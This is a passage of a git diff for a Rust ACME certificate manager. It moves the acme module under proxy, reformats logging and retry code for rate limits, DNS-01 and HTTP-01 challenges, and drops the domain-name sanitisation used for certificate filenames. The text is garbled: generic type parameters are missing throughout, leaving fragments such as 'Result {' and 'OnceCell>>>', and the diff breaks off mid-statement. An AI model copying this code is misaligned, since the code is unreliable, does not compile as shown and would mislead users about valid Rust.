-145,7 +162,7 @@ impl EmbeddedAcmeServer { Ok(()) } - fn create_domain_config(&self, domain: &DomainConfig) -> Result { + fn create_domain_config(&self, domain: &DomainConfig) -> Result { let mut domain_https_path = self.config.storage_path.clone(); domain_https_path.push(&domain.domain); @@ -172,26 +189,31 @@ impl EmbeddedAcmeServer { domain.domain.clone() }; - Ok(crate::acme::Config { + Ok(crate::proxy::acme::Config { https_path: domain_https_path, cert_path, key_path, static_path, - opts: crate::acme::ConfigOpts { + opts: crate::proxy::acme::ConfigOpts { ip: self.config.bind_ip.clone(), port: self.config.port, domain: acme_domain, - email: Some(domain.email.clone().unwrap_or_else(|| self.config.email.clone())), + email: Some( + domain + .email + .clone() + .unwrap_or_else(|| self.config.email.clone()), + ), https_dns: domain.dns, development: self.config.development, dns_lookup_max_attempts: Some(100), dns_lookup_delay_seconds: Some(10), - storage_type: { - // Always use Redis (storage_type option is kept for compatibility but always uses Redis) - let storage_type = Some("redis".to_string()); - tracing::info!("Domain {}: Using storage type: 'redis'", domain.domain); - storage_type - }, + storage_type: { + // Always use Redis (storage_type option is kept for compatibility but always uses Redis) + let storage_type = Some("redis".to_string()); + tracing::info!("Domain {}: Using storage type: 'redis'", domain.domain); + storage_type + }, redis_url: self.config.redis_url.clone(), lock_ttl_seconds: Some(900), redis_ssl: self.config.redis_ssl.clone(), @@ -231,7 +253,10 @@ async fn check_all_certs_expiration_handler( let domain_cfg = match create_domain_config_for_handler(&config, &domain_config) { Ok(cfg) => cfg, Err(e) => { - warn!("Error creating domain config for {}: {}", domain_config.domain, e); + warn!( + "Error creating domain config for {}: {}", + domain_config.domain, e + ); continue; } }; @@ -366,9 +391,15 @@ async fn renew_cert_handler( let domain_config_clone = domain_config.clone(); tokio::spawn(async move { if let Err(e) = request_cert(&domain_cfg).await { - warn!("Error renewing certificate for {}: {}", domain_config_clone.domain, e); + warn!( + "Error renewing certificate for {}: {}", + domain_config_clone.domain, e + ); } else { - info!("Certificate renewed successfully for {}!", domain_config_clone.domain); + info!( + "Certificate renewed successfully for {}!", + domain_config_clone.domain + ); } }); @@ -380,7 +411,7 @@ async fn renew_cert_handler( fn create_domain_config_for_handler( config: &EmbeddedAcmeConfig, domain: &DomainConfig, -) -> Result { +) -> Result { let mut domain_https_path = config.storage_path.clone(); domain_https_path.push(&domain.domain); @@ -390,12 +421,12 @@ fn create_domain_config_for_handler( key_path.push("key.pem"); let static_path = domain_https_path.clone(); - Ok(crate::acme::Config { + Ok(crate::proxy::acme::Config { https_path: domain_https_path, cert_path, key_path, static_path, - opts: crate::acme::ConfigOpts { + opts: crate::proxy::acme::ConfigOpts { ip: config.bind_ip.clone(), port: config.port, domain: domain.domain.clone(), @@ -415,4 +446,3 @@ fn create_domain_config_for_handler( }, }) } - diff --git a/src/acme/errors.rs b/src/proxy/acme/errors.rs similarity index 98% rename from src/acme/errors.rs rename to src/proxy/acme/errors.rs index 8f1dd14..fbae073 100644 --- a/src/acme/errors.rs +++ b/src/proxy/acme/errors.rs @@ -1,4 +1,3 @@ use anyhow::Result; pub type AtomicServerResult = Result; - diff --git a/src/acme/lib.rs b/src/proxy/acme/lib.rs similarity index 64% rename from src/acme/lib.rs rename to src/proxy/acme/lib.rs index fd52900..c772269 100644 --- a/src/acme/lib.rs +++ b/src/proxy/acme/lib.rs @@ -3,18 +3,18 @@ //! checks if certificates are not outdated, //! persists files on disk. -use crate::acme::{Config, AppConfig, RetryConfig, AtomicServerResult}; -use crate::acme::{DomainConfig, DomainReaderFactory}; -use crate::acme::{Storage, StorageFactory, StorageType}; +use crate::proxy::acme::{AppConfig, AtomicServerResult, Config, RetryConfig}; +use crate::proxy::acme::{DomainConfig, DomainReaderFactory}; +use crate::proxy::acme::{Storage, StorageFactory, StorageType}; -use actix_web::{App, HttpServer, HttpResponse, web, Responder}; -use anyhow::{anyhow, Context}; +use actix_web::{App, HttpResponse, HttpServer, Responder, web}; +use anyhow::{Context, anyhow}; +use once_cell::sync::OnceCell; use serde::Serialize; use std::io::BufReader; use std::sync::Arc; use std::sync::RwLock as StdRwLock; -use once_cell::sync::OnceCell; -use tracing::{info, warn, debug}; +use tracing::{debug, info, warn}; use trust_dns_resolver::config::{ResolverConfig, ResolverOpts}; /// Global proxy_certificates path (set at startup) @@ -22,9 +22,7 @@ static PROXY_CERTIFICATES_PATH: OnceCell>>> = OnceC /// Set the proxy_certificates path (called from main.rs) pub fn set_proxy_certificates_path(path: Option) { - let path_arc = PROXY_CERTIFICATES_PATH.get_or_init(|| { - Arc::new(StdRwLock::new(None)) - }); + let path_arc = PROXY_CERTIFICATES_PATH.get_or_init(|| Arc::new(StdRwLock::new(None))); if let Ok(mut path_guard) = path_arc.write() { *path_guard = path; } @@ -32,11 +30,9 @@ pub fn set_proxy_certificates_path(path: Option) { /// Get the proxy_certificates path fn get_proxy_certificates_path() -> Option { - PROXY_CERTIFICATES_PATH.get() - .and_then(|path_arc| { - path_arc.read().ok() - .and_then(|guard| guard.clone()) - }) + PROXY_CERTIFICATES_PATH + .get() + .and_then(|path_arc| path_arc.read().ok().and_then(|guard| guard.clone())) } /// Normalize PEM certificate chain to ensure proper format @@ -46,12 +42,16 @@ fn normalize_pem_chain(chain: &str) -> String { let mut normalized = chain.to_string(); // Ensure newline between END CERTIFICATE and BEGIN CERTIFICATE - normalized = normalized.replace("-----END CERTIFICATE----------BEGIN CERTIFICATE-----", - "-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----"); + normalized = normalized.replace( + "-----END CERTIFICATE----------BEGIN CERTIFICATE-----", + "-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----", + ); // Ensure newline between END CERTIFICATE and BEGIN PRIVATE KEY (for key files) - normalized = normalized.replace("-----END CERTIFICATE----------BEGIN PRIVATE KEY-----", - "-----END CERTIFICATE-----\n-----BEGIN PRIVATE KEY-----"); + normalized = normalized.replace( + "-----END CERTIFICATE----------BEGIN PRIVATE KEY-----", + "-----END CERTIFICATE-----\n-----BEGIN PRIVATE KEY-----", + ); // Ensure file ends with newline if !normalized.ends_with('\n') { @@ -62,7 +62,7 @@ fn normalize_pem_chain(chain: &str) -> String { } /// Save certificate to proxy_certificates path in the format expected by the proxy -/// Format: {sanitized_domain}.crt and {sanitized_domain}.key +/// Format: {domain}.crt and {domain}.key (stored as-is) async fn save_cert_to_proxy_path( domain: &str, fullchain: &str, @@ -75,59 +75,73 @@ async fn save_cert_to_proxy_path( // Create directory if it doesn't exist let cert_dir = Path::new(proxy_certificates_path); - fs::create_dir_all(cert_dir).await - .with_context(|| format!("Failed to create proxy_certificates directory: {}", proxy_certificates_path))?; + fs::create_dir_all(cert_dir).await.with_context(|| { + format!( + "Failed to create proxy_certificates directory: {}", + proxy_certificates_path + ) + })?; - // Normalize domain name (remove wildcard prefix if present) before sanitizing - // This ensures the filename matches what the certificate worker expects - let normalized_domain = domain.strip_prefix("*.").unwrap_or(domain); - // Sanitize domain name for filename (replace . with _ and * with _) - let sanitized_domain = normalized_domain.replace('.', "_").replace('*', "_"); - let cert_path = cert_dir.join(format!("{}.crt", sanitized_domain)); - let key_path = cert_dir.join(format!("{}.key", sanitized_domain)); + let cert_path = cert_dir.join(format!("{}.crt", domain)); + let key_path = cert_dir.join(format!("{}.key", domain)); // Normalize PEM format let normalized_fullchain = normalize_pem_chain(fullchain); let normalized_key = normalize_pem_chain(private_key); // Write certificate file - let mut cert_file = fs::File::create(&cert_path).await + let mut cert_file = fs::File::create(&cert_path) + .await .with_context(|| format!("Failed to create certificate file: {}", cert_path.display()))?; - cert_file.write_all(normalized_fullchain.as_bytes()).await + cert_file + .write_all(normalized_fullchain.as_bytes()) + .await .with_context(|| format!("Failed to write certificate file: {}", cert_path.display()))?; - cert_file.sync_all().await + cert_file + .sync_all() + .await .with_context(|| format!("Failed to sync certificate file: {}", cert_path.display()))?; // Write key file - let mut key_file = fs::File::create(&key_path).await + let mut key_file = fs::File::create(&key_path) + .await .with_context(|| format!("Failed to create key file: {}", key_path.display()))?; - key_file.write_all(normalized_key.as_bytes()).await + key_file + .write_all(normalized_key.as_bytes()) + .await .with_context(|| format!("Failed to write key file: {}", key_path.display()))?; - key_file.sync_all().await + key_file + .sync_all() + .await .with_context(|| format!("Failed to sync key file: {}", key_path.display()))?; - info!("Saved certificate for domain '{}' to proxy_certificates path: {} (cert: {}, key: {})", - domain, proxy_certificates_path, cert_path.display(), key_path.display()); + info!( + "Saved certificate for domain '{}' to proxy_certificates path: {} (cert: {}, key: {})", + domain, + proxy_certificates_path, + cert_path.display(), + key_path.display() + ); Ok(()) } /// Create RUSTLS server config from certificates in storage -pub fn get_https_config( - config: &Config, -) -> AtomicServerResult { - use rustls_pemfile::{certs, pkcs8_private_keys}; +pub fn get_https_config(config: &Config) -> AtomicServerResult { use rustls::pki_types::{CertificateDer, PrivateKeyDer}; + use rustls_pemfile::{certs, pkcs8_private_keys}; // Create storage backend (file system by default) let storage = StorageFactory::create_default(config)?; // Read fullchain synchronously (rustls requires sync) // Use fullchain which includes both cert and chain - let fullchain_bytes = storage.read_fullchain_sync() - .ok_or_else(|| anyhow!("Storage backend does not support synchronous fullchain reading"))??; + let fullchain_bytes = storage.read_fullchain_sync().ok_or_else(|| { + anyhow!("Storage backend does not support synchronous fullchain reading") + })??; - let key_bytes = storage.read_key_sync() + let key_bytes = storage + .read_key_sync() .ok_or_else(|| anyhow!("Storage backend does not support synchronous key reading"))??; let cert_file = &mut BufReader::new(std::io::Cursor::new(fullchain_bytes)); @@ -147,7 +161,9 @@ pub fn get_https_config( .collect(); if keys.is_empty() { - return Err(anyhow!("No key found. Consider deleting the storage directory and restart to create new keys.")); + return Err(anyhow!( + "No key found. Consider deleting the storage directory and restart to create new keys." + )); } let server_config = rustls::ServerConfig::builder() @@ -178,7 +194,10 @@ pub async fn should_retry_failed_cert( // Check if max retries exceeded let failure_count = storage.get_failure_count().await.unwrap_or(0); if retry_config.max_retries > 0 && failure_count >= retry_config.max_retries { - warn!("Maximum retry count ({}) exceeded for domain {}. Skipping retry.", retry_config.max_retries, config.opts.domain); + warn!( + "Maximum retry count ({}) exceeded for domain {}. Skipping retry.", + retry_config.max_retries, config.opts.domain + ); return Ok(false); } @@ -193,11 +212,17 @@ pub async fn should_retry_failed_cert( let time_since_failure_secs = time_since_failure.num_seconds() as u64; if time_since_failure_secs >= delay_seconds { - info!("Retry delay ({}) has passed for domain {}. Last failure was {} seconds ago. Will retry.", delay_seconds, config.opts.domain, time_since_failure_secs); + info!( + "Retry delay ({}) has passed for domain {}. Last failure was {} seconds ago. Will retry.", + delay_seconds, config.opts.domain, time_since_failure_secs + ); Ok(true) } else { let remaining = delay_seconds - time_since_failure_secs; - info!("Retry delay not yet reached for domain {}. Will retry in {} seconds.", config.opts.domain, remaining); + info!( + "Retry delay not yet reached for domain {}. Will retry in {} seconds.", + config.opts.domain, remaining + ); Ok(false) } } @@ -208,9 +233,7 @@ pub async fn should_renew_certs_check(config: &Config) -> AtomicServerResult { - warn!("Error checking certificate expiration for {}: {}", domain, e); + warn!( + "Error checking certificate expiration for {}: {}", + domain, e + ); HttpResponse::InternalServerError().json(serde_json::json!({ "error": format!("Failed to check certificate expiration: {}", e) })) @@ -380,9 +418,15 @@ async fn renew_cert_if_needed( let domain_cfg = app_config.create_domain_config(domain_config, base_path.clone()); if should_renew_certs_check(&domain_cfg).await? { - info!("Certificate for {} is expiring, starting renewal process...", domain_config.domain); + info!( + "Certificate for {} is expiring, starting renewal process...", + domain_config.domain + ); request_cert(&domain_cfg).await?; - info!("Certificate renewed successfully for {}!", domain_config.domain); + info!( + "Certificate renewed successfully for {}!", + domain_config.domain + ); } Ok(()) @@ -427,8 +471,17 @@ async fn check_all_certs_expiration_handler( // Spawn renewal task in background tokio::spawn(async move { - if let Err(e) = renew_cert_if_needed(&app_config_clone, &domain_config_clone, &base_path_clone).await { - warn!("Error renewing certificate for {}: {}", domain_config_clone.domain, e); + if let Err(e) = renew_cert_if_needed( + &app_config_clone, + &domain_config_clone, + &base_path_clone, + ) + .await + { + warn!( + "Error renewing certificate for {}: {}", + domain_config_clone.domain, e + ); } }); @@ -437,7 +490,10 @@ async fn check_all_certs_expiration_handler( results.push(info); } Err(e) => { - warn!("Error checking certificate expiration for {}: {}", domain_config.domain, e); + warn!( + "Error checking certificate expiration for {}: {}", + domain_config.domain, e + ); // Add error info for this domain results.push(CertificateExpirationInfo { domain: domain_config.domain.clone(), @@ -457,15 +513,26 @@ async fn check_all_certs_expiration_handler( } /// Check DNS TXT record for DNS-01 challenge -async fn check_dns_txt_record(record_name: &str, expected_value: &str, max_attempts: u32, delay_seconds: u64) -> bool { +async fn check_dns_txt_record( + record_name: &str, + expected_value: &str, + max_attempts: u32, + delay_seconds: u64, +) -> bool { use trust_dns_resolver::TokioAsyncResolver; // Use Google DNS as primary resolver (more reliable than system DNS) // This ensures we're querying authoritative DNS servers let resolver_config = ResolverConfig::google(); - info!("Checking DNS TXT record: {} (expected value: {})", record_name, expected_value); - info!("DNS lookup settings: max_attempts={}, delay_seconds={}", max_attempts, delay_seconds); + info!( + "Checking DNS TXT record: {} (expected value: {})", + record_name, expected_value + ); + info!( + "DNS lookup settings: max_attempts={}, delay_seconds={}", + max_attempts, delay_seconds + ); for attempt in 1..=max_attempts { // Create a new resolver for each attempt to ensure no caching @@ -477,10 +544,7 @@ async fn check_dns_txt_record(record_name: &str, expected_value: &str, max_attem resolver_opts.cache_size = 0; // Disable DNS cache by setting cache size to 0 // Create a fresh DNS resolver for each attempt to avoid any caching - let resolver = TokioAsyncResolver::tokio( - resolver_config.clone(), - resolver_opts, - ); + let resolver = TokioAsyncResolver::tokio(resolver_config.clone(), resolver_opts); match resolver.txt_lookup(record_name).await { Ok(lookup) => { @@ -495,7 +559,10 @@ async fn check_dns_txt_record(record_name: &str, expected_value: &str, max_attem found_values.push(txt_string.clone()); if txt_string == expected_value { - info!("DNS TXT record matches expected value on attempt {}: {}", attempt, txt_string); + info!( + "DNS TXT record matches expected value on attempt {}: {}", + attempt, txt_string + ); return true; } } @@ -503,11 +570,17 @@ async fn check_dns_txt_record(record_name: &str, expected_value: &str, max_attem if found_any { if attempt == 1 || attempt % 6 == 0 { - warn!("DNS record found but value doesn't match. Expected: '{}', Found: {:?}", expected_value, found_values); + warn!( + "DNS record found but value doesn't match. Expected: '{}', Found: {:?}", + expected_value, found_values + ); } } else { if attempt % 6 == 0 { - info!("DNS record not found yet (attempt {}/{})...", attempt, max_attempts); + info!( + "DNS record not found yet (attempt {}/{})...", + attempt, max_attempts + ); } } } @@ -534,9 +607,15 @@ async fn check_acme_challenge_endpoint(config: &Config) -> anyhow::Result<()> { use std::time::Duration; // Build the ACME server URL (typically 127.0.0.1:9180) - let acme_url = format!("http://{}:{}/.well-known/acme-challenge/test-endpoint-check", config.opts.ip, config.opts.port); + let acme_url = format!( + "http://{}:{}/.well-known/acme-challenge/test-endpoint-check", + config.opts.ip, config.opts.port + ); - debug!("Checking if ACME challenge endpoint is available at {}", acme_url); + debug!( + "Checking if ACME challenge endpoint is available at {}", + acme_url + ); // Create HTTP client with timeout let client = reqwest::Client::builder() @@ -555,13 +634,19 @@ async fn check_acme_challenge_endpoint(config: &Config) -> anyhow::Result<()> { let status = response.status(); if status.is_success() || status.as_u16() == 404 { if attempt > 1 { - debug!("ACME challenge endpoint is now available (status: {}) after {} attempt(s)", status, attempt); + debug!( + "ACME challenge endpoint is now available (status: {}) after {} attempt(s)", + status, attempt + ); } else { debug!("ACME challenge endpoint is available (status: {})", status); } return Ok(()); } else { - return Err(anyhow::anyhow!("ACME server returned unexpected status: {}", status)); + return Err(anyhow::anyhow!( + "ACME server returned unexpected status: {}", + status + )); } } Err(e) => { @@ -574,7 +659,10 @@ async fn check_acme_challenge_endpoint(config: &Config) -> anyhow::Result<()> { || e.is_timeout(); if attempt < max_retries && is_connection_error { - debug!("ACME server not ready yet (attempt {}/{}), retrying in {:?}...", attempt, max_retries, retry_delay); + debug!( + "ACME server not ready yet (attempt {}/{}), retrying in {:?}...", + attempt, max_retries, retry_delay + ); tokio::time::sleep(retry_delay).await; // Exponential backoff: 10ms, 20ms, 40ms, 80ms, 160ms (user changed from 500ms) retry_delay = retry_delay * 2; @@ -582,15 +670,28 @@ async fn check_acme_challenge_endpoint(config: &Config) -> anyhow::Result<()> { } // Last attempt or non-connection error - return error if attempt >= max_retries { - return Err(anyhow::anyhow!("Failed to connect to ACME server at {} after {} attempts: {}", acme_url, max_retries, e)); + return Err(anyhow::anyhow!( + "Failed to connect to ACME server at {} after {} attempts: {}", + acme_url, + max_retries, + e + )); } else { - return Err(anyhow::anyhow!("Failed to connect to ACME server at {} (non-retryable error): {}", acme_url, e)); + return Err(anyhow::anyhow!( + "Failed to connect to ACME server at {} (non-retryable error): {}", + acme_url, + e + )); } } } } - Err(anyhow::anyhow!("Failed to connect to ACME server at {} after {} attempts", acme_url, max_retries)) + Err(anyhow::anyhow!( + "Failed to connect to ACME server at {} after {} attempts", + acme_url, + max_retries + )) } /// Writes challenge file for HTTP-01 challenge @@ -601,9 +702,14 @@ async fn cert_init_server( key_auth: &str, ) -> AtomicServerResult<()> { let storage = StorageFactory::create_default(config)?; - storage.write_challenge(&challenge.token.to_string(), key_auth).await?; + storage + .write_challenge(&challenge.token.to_string(), key_auth) + .await?; - info!("Challenge file written. Main HTTP server will serve it at /.well-known/acme-challenge/{}", challenge.token); + info!( + "Challenge file written. Main HTTP server will serve it at /.well-known/acme-challenge/{}", + challenge.token + ); Ok(()) } @@ -616,14 +722,16 @@ pub async fn request_cert(config: &Config) -> AtomicServerResult<()> { if storage_type == StorageType::Redis { // Use distributed lock for Redis storage to prevent multiple instances from processing the same domain // Create RedisStorage directly to access lock methods - let redis_storage = crate::acme::storage::RedisStorage::new(config)?; + let redis_storage = crate::proxy::acme::storage::RedisStorage::new(config)?; // Lock TTL from config (default: 900 seconds = 15 minutes) let lock_ttl_seconds = config.opts.lock_ttl_seconds.unwrap_or(900); - return redis_storage.with_lock(lock_ttl_seconds, || async { - request_cert_internal(config).await - }).await; + return redis_storage + .with_lock(lock_ttl_seconds, || async { + request_cert_internal(config).await + }) + .await; } // Redis storage always uses distributed lock (above) @@ -634,15 +742,18 @@ pub async fn request_cert(config: &Config) -> AtomicServerResult<()> { /// Returns the retry-after timestamp if found, None otherwise /// Handles both timestamp formats and ISO 8601 duration formats fn parse_retry_after(error_msg: &str) -> Option> { - use chrono::{Utc, Duration}; + use chrono::{Duration, Utc}; // Look for "retry after" pattern (case insensitive) let error_msg_lower = error_msg.to_lowercase(); if let Some(pos) = error_msg_lower.find("retry after") { // Get the text after "retry after" from the original message (preserve case for parsing) - let after_pos = error_msg[pos + "retry after".len()..].find(|c: char| !c.is_whitespace()) + let after_pos = error_msg[pos + "retry after".len()..] + .find(|c: char| !c.is_whitespace()) .unwrap_or(0); - let mut after_text_str = error_msg[pos + "retry after".len() + after_pos..].trim().to_string(); + let mut after_text_str = error_msg[pos + "retry after".len() + after_pos..] + .trim() + .to_string(); // Try to find the end of the timestamp/duration // For timestamps like "2025-11-14 21:13:29 UTC", stop at end of line or before URL/links @@ -650,7 +761,10 @@ fn parse_retry_after(error_msg: &str) -> Option> { // - End of string // - Before URLs (http:// or https://) // - Before "see" or ":" followed by URL - if let Some(url_pos) = after_text_str.find("http://").or_else(|| after_text_str.find("https://")) { + if let Some(url_pos) = after_text_str + .find("http://") + .or_else(|| after_text_str.find("https://")) + { after_text_str = after_text_str[..url_pos].trim().to_string(); } // Extract timestamp - format is typically "2025-11-14 21:13:29 UTC" followed by ": see https://..." @@ -660,7 +774,10 @@ fn parse_retry_after(error_msg: &str) -> Option> { after_text_str = after_text_str[..utc_pos + 4].trim().to_string(); } else { // No " UTC" found, try to stop before URLs or "see" keyword - if let Some(url_pos) = after_text_str.find("http://").or_else(|| after_text_str.find("https://")) { + if let Some(url_pos) = after_text_str + .find("http://") + .or_else(|| after_text_str.find("https://")) + { after_text_str = after_text_str[..url_pos].trim().to_string(); } if let Some(see_pos) = after_text_str.find(" see ") { @@ -701,15 +818,19 @@ fn parse_retry_after(error_msg: &str) -> Option> { if after_text.starts_with("PT") { // Parse ISO 8601 duration: PT[nH][nM][nS] or PT[n]S // Handle case where duration ends with 'S' (seconds) - let duration_str = if after_text.ends_with('S') && !after_text.ends_with("MS") && !after_text.ends_with("HS") { - &after_text[2..after_text.len()-1] // Remove "PT" prefix and "S" suffix + let duration_str = if after_text.ends_with('S') + && !after_text.ends_with("MS") + && !after_text.ends_with("HS") + { + &after_text[2..after_text.len() - 1] // Remove "PT" prefix and "S" suffix } else { &after_text[2..] // Just remove "PT" prefix }; // Try to parse as seconds (e.g., "86225.992004616") if let Ok(seconds) = duration_str.parse::() { - let duration = Duration::seconds(seconds as i64) + Duration::nanoseconds((seconds.fract() * 1_000_000_000.0) as i64); + let duration = Duration::seconds(seconds as i64) + + Duration::nanoseconds((seconds.fract() * 1_000_000_000.0) as i64); return Some(Utc::now() + duration); } @@ -752,7 +873,8 @@ fn parse_retry_after(error_msg: &str) -> Option> { } if total_seconds > 0.0 { - let duration = Duration::seconds(total_seconds as i64) + Duration::nanoseconds((total_seconds.fract() * 1_000_000_000.0) as i64); + let duration = Duration::seconds(total_seconds as i64) + + Duration::nanoseconds((total_seconds.fract() * 1_000_000_000.0) as i64); return Some(Utc::now() + duration); } } @@ -782,7 +904,10 @@ async fn check_account_exists( Err(e) => { let error_msg = format!("{}", e); // If it's a rate limit error, propagate it - if error_msg.contains("rateLimited") || error_msg.contains("rate limit") || error_msg.contains("too many") { + if error_msg.contains("rateLimited") + || error_msg.contains("rate limit") + || error_msg.contains("too many") + { return Err(e.into()); } // Otherwise, account doesn't exist @@ -810,18 +935,26 @@ async fn create_new_account( Err(e) => { // Check if it's a rate limit error let error_msg = format!("{}", e); - if error_msg.contains("rateLimited") || error_msg.contains("rate limit") || error_msg.contains("too many") { + if error_msg.contains("rateLimited") + || error_msg.contains("rate limit") + || error_msg.contains("too many") + { if let Some(retry_after) = parse_retry_after(&error_msg) { let now = chrono::Utc::now(); if retry_after > now { let wait_duration = retry_after - now; let wait_secs = wait_duration.num_seconds().max(0) as u64; - warn!("Rate limit hit. Waiting {} seconds until {} before retrying account creation", wait_secs, retry_after); + warn!( + "Rate limit hit. Waiting {} seconds until {} before retrying account creation", + wait_secs, retry_after + ); tokio::time::sleep(tokio::time::Duration::from_secs(wait_secs + 1)).await; } } else { // Rate limit error but couldn't parse retry-after, wait a default time - warn!("Rate limit hit but couldn't parse retry-after time. Waiting 3 hours (10800 seconds) before retrying"); + warn!( + "Rate limit hit but couldn't parse retry-after time. Waiting 3 hours (10800 seconds) before retrying" + ); tokio::time::sleep(tokio::time::Duration::from_secs(10800)).await; } } else { @@ -855,12 +988,17 @@ async fn create_new_account( // Save credentials for future use (store as JSON value for now) if let Ok(creds_json) = serde_json::to_string(&creds) { if let Err(e) = storage.write_account_credentials(&creds_json).await { - warn!("Failed to save account credentials to storage: {}. Account will be recreated on next run.", e); + warn!( + "Failed to save account credentials to storage: {}. Account will be recreated on next run.", + e + ); } else { info!("Saved LetsEncrypt account credentials to storage"); } } else { - warn!("Failed to serialize account credentials. Account will be recreated on next run."); + warn!( + "Failed to serialize account credentials. Account will be recreated on next run." + ); } return Ok((account, creds)); } @@ -868,14 +1006,21 @@ async fn create_new_account( let error_msg = format!("{}", e); // Check if it's a rate limit error - if error_msg.contains("rateLimited") || error_msg.contains("rate limit") || error_msg.contains("too many") { + if error_msg.contains("rateLimited") + || error_msg.contains("rate limit") + || error_msg.contains("too many") + { if let Some(retry_after) = parse_retry_after(&error_msg) { let now = chrono::Utc::now(); if retry_after > now { let wait_duration = retry_after - now; let wait_secs = wait_duration.num_seconds().max(0) as u64; - warn!("Rate limit hit during account creation. Waiting {} seconds until {} before retrying", wait_secs, retry_after); - tokio::time::sleep(tokio::time::Duration::from_secs(wait_secs + 1)).await; + warn!( + "Rate limit hit during account creation. Waiting {} seconds until {} before retrying", + wait_secs, retry_after + ); + tokio::time::sleep(tokio::time::Duration::from_secs(wait_secs + 1)) + .await; retry_count += 1; if retry_count < max_retries { continue; @@ -885,7 +1030,10 @@ async fn create_new_account( // Rate limit error but couldn't parse retry-after if retry_count < max_retries { let wait_secs = 10800; // 3 hours default - warn!("Rate limit hit but couldn't parse retry-after time. Waiting {} seconds before retrying", wait_secs); + warn!( + "Rate limit hit but couldn't parse retry-after time. Waiting {} seconds before retrying", + wait_secs + ); tokio::time::sleep(tokio::time::Duration::from_secs(wait_secs)).await; retry_count += 1; continue; @@ -908,7 +1056,10 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { let use_dns = config.opts.https_dns || is_wildcard; if is_wildcard && !config.opts.https_dns { - warn!("Wildcard domain detected ({}), automatically using DNS-01 challenge", config.opts.domain); + warn!( + "Wildcard domain detected ({}), automatically using DNS-01 challenge", + config.opts.domain + ); } let challenge_type = if use_dns { @@ -918,7 +1069,10 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { debug!("Using HTTP-01 challenge"); // Check if ACME challenge endpoint is available before proceeding if let Err(e) = check_acme_challenge_endpoint(config).await { - let error_msg = format!("ACME challenge endpoint not available for HTTP-01 challenge: {}. Skipping certificate request.", e); + let error_msg = format!( + "ACME challenge endpoint not available for HTTP-01 challenge: {}. Skipping certificate request.", + e + ); warn!("{}", error_msg); let storage = StorageFactory::create_default(config)?; if let Err(record_err) = storage.record_failure(&error_msg).await { @@ -949,7 +1103,9 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { // Try to load existing account credentials from storage let storage = StorageFactory::create_default(config)?; - let existing_creds = storage.read_account_credentials().await + let existing_creds = storage + .read_account_credentials() + .await .context("Failed to read account credentials from storage")?; // Try to restore account from stored credentials, but fall back to creating new account if it fails @@ -969,35 +1125,56 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { .await { Ok(acc) => { - debug!("Successfully restored LetsEncrypt account from stored credentials"); + debug!( + "Successfully restored LetsEncrypt account from stored credentials" + ); // Get the credentials back from the account (they're stored in the account) // For now, we'll use the stored credentials JSON - let restored_creds = serde_json::from_str::(&creds_json) - .expect("Credentials were just parsed successfully"); + let restored_creds = serde_json::from_str::< + instant_acme::AccountCredentials, + >(&creds_json) + .expect("Credentials were just parsed successfully"); (acc, restored_creds) } Err(e) => { let error_msg = format!("{}", e); - warn!("Failed to restore account from stored credentials: {}. Will check if account exists.", error_msg); + warn!( + "Failed to restore account from stored credentials: {}. Will check if account exists.", + error_msg + ); // If restoration fails, check if account exists match check_account_exists(&email, lets_encrypt_url).await { Ok(Some((acc, cr))) => { - info!("Account exists but credentials were invalid. Using existing account."); + info!( + "Account exists but credentials were invalid. Using existing account." + ); (acc, cr) } Ok(None) => { - warn!("Stored credentials invalid and account doesn't exist. Creating new account."); + warn!( + "Stored credentials invalid and account doesn't exist. Creating new account." + ); create_new_account(&storage, &email, lets_encrypt_url).await? } Err(e) => { let error_msg = format!("{}", e); - if error_msg.contains("rateLimited") || error_msg.contains("rate limit") || error_msg.contains("too many") { - warn!("Rate limit hit while checking account. Will wait and retry in create_new_account."); - create_new_account(&storage, &email, lets_encrypt_url).await? + if error_msg.contains("rateLimited") + || error_msg.contains("rate limit") + || error_msg.contains("too many") + { + warn!( + "Rate limit hit while checking account. Will wait and retry in create_new_account." + ); + create_new_account(&storage, &email, lets_encrypt_url) + .await? } else { - warn!("Failed to check account existence: {}. Creating new account.", e); - create_new_account(&storage, &email, lets_encrypt_url).await? + warn!( + "Failed to check account existence: {}. Creating new account.", + e + ); + create_new_account(&storage, &email, lets_encrypt_url) + .await? } } } @@ -1005,7 +1182,10 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { } } Err(e) => { - warn!("Failed to parse stored credentials: {}. Creating new account.", e); + warn!( + "Failed to parse stored credentials: {}. Creating new account.", + e + ); create_new_account(&storage, &email, lets_encrypt_url).await? } } @@ -1039,27 +1219,36 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { } // Check if we're still in rate limit period before attempting request - use chrono::{Utc, Duration}; + use chrono::{Duration, Utc}; let storage = StorageFactory::create_default(config)?; if let Ok(Some((last_failure_time, last_failure_msg))) = storage.get_last_failure().await { // Check if the last failure was a rate limit error - if last_failure_msg.contains("rateLimited") || - last_failure_msg.contains("rate limit") || - last_failure_msg.contains("too many certificates") { + if last_failure_msg.contains("rateLimited") + || last_failure_msg.contains("rate limit") + || last_failure_msg.contains("too many certificates") + { // Parse retry-after time from error message if let Some(retry_after) = parse_retry_after(&last_failure_msg) { let now = Utc::now(); if now < retry_after { let wait_duration = retry_after - now; - info!("Rate limit still active for domain {}: retry after {} ({} remaining). Skipping certificate request.", - config.opts.domain, retry_after, wait_duration); + info!( + "Rate limit still active for domain {}: retry after {} ({} remaining). Skipping certificate request.", + config.opts.domain, retry_after, wait_duration + ); return Ok(()); } else { - debug!("Rate limit period has passed for domain {}. Proceeding with certificate request.", config.opts.domain); + debug!( + "Rate limit period has passed for domain {}. Proceeding with certificate request.", + config.opts.domain + ); } } else { // Log the error message for debugging - tracing::debug!("Failed to parse retry-after from error message: {}", last_failure_msg); + tracing::debug!( + "Failed to parse retry-after from error message: {}", + last_failure_msg + ); // Can't parse retry-after from error message // Try to extract duration from the error message if it contains ISO 8601 duration // Look for patterns like "PT86225S" or "PT24H" anywhere in the message @@ -1078,8 +1267,10 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { let now = Utc::now(); if now < retry_after { let wait_duration = retry_after - now; - info!("Rate limit still active for domain {}: retry after {} ({} remaining). Skipping certificate request.", - config.opts.domain, retry_after, wait_duration); + 